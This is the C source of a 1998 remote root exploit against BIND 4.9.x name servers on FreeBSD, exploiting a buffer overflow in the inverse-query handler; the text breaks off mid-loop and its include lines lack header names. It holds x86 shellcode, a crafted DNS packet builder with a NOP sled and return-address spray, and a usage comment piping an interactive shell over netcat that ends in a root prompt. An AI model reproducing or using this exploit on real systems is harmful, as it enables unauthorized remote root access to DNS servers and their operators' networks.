/* remote bind 4.9.x exploit Example for FreeBSD (do not use!.) 28-Apr-1998 by stran9er credits: bof-test.c written solely by Joshua J. Drake (jdrake@pulsar.net) bug in: bind/named/ns_req.c:req_inquery() */ /* offsets: 4.9.6 min = 0 options fake-iquery 4.9.6-REL min = -100 8.1.1 min = 400 [ fake-iquery yes; ] */ /* Usage example: $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53 Adress: 0xefbfd444 Offset: 0 sh: can't access tty; job control turned off # whoami root # */ #define QUERY_LEN 0x600 #include #include #include #include #include #include #include typedef struct { unsigned short int r_class; /* class number */ unsigned short int r_type; /* type number */ unsigned long int r_ttl; /* time to live */ unsigned short int r_size; /* size of data area */ char r_data[QUERY_LEN]; /* pointer to data */ } rrecord; char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02" "\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16" "\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88" "\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1" "\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21" "\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F" "\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21"; char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by */ char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */ main(int argc, char **argv) { HEADER *h; rrecord *rr; char db[sizeof(HEADER)+sizeof(rrecord)+2]; char *buf, *ptr; unsigned char cat[]="no"; short int *buflen; unsigned long stack = 0xefbfd444, offset; int sh=1024,o,b,c,t; if ( (argc<3) || (*argv[2]!='/')) { printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]); exit(1); } offset=atoi(argv[1]); stack+=offset; fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset); buf=db; memset(buf, 0, sizeof(db)); buflen=(short int *)buf; *buflen=htons(sizeof(db)-2); h = (HEADER *)(buf+2); h->id = rand() & 0xfff; h->opcode = IQUERY; h->ancount = htons(1); rr=(rrecord *)((char *)h+sizeof(HEADER)+1); rr->r_class= htons(C_IN); rr->r_type = htons(T_A); rr->r_ttl = htonl(31337); rr->r_size = htons(QUERY_LEN+1); ptr=rr->r_data+1; memset(ptr,0x90,QUERY_LEN); ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */ for(c=sh;c<=(QUERY_LEN-4);) { if ((c+4) > (QUERY_LEN-4)) stack +=4; ptr[c++] = stack & 0x000000ff; ptr[c++] = (stack & 0x0000ff00) >> 8; ptr[c++] = (stack & 0x00ff0000) >> 16; ptr[c++] = (stack & 0xff000000) >> 24; } strcpy(ptr+sh,shellc); for (b=2;b